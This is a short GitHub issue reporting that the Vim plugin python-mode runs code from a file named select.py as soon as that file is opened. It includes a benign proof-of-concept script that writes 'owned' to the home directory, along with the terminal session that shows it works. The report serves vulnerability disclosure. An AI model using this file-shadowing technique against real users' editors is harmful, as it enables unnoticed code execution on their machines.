Skip to content

arbitrary code execution is possible when using python-mode #162

Closed
@kholia

Description

@kholia

Hi,

It is possible to achieve arbitrary code execution when using python-mode.

➜  cat > select.py
import os

homedir = os.path.expanduser("~")

with open(os.path.join(homedir, "owned"), "w") as f:
    f.write("owned")

print "owned"

➜  vim select.py
owned
Press ENTER or type command to continue

➜  cat ~/owned 
owned

➜ vim --version
VIM - Vi IMproved 7.3 (2010 Aug 15, compiled Oct 23 2012 18:42:18)
Included patches: 1-712
Compiled by ArchLinux

Care should be taken when opening source code from untrusted sources.

Regards,
Dhiru

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions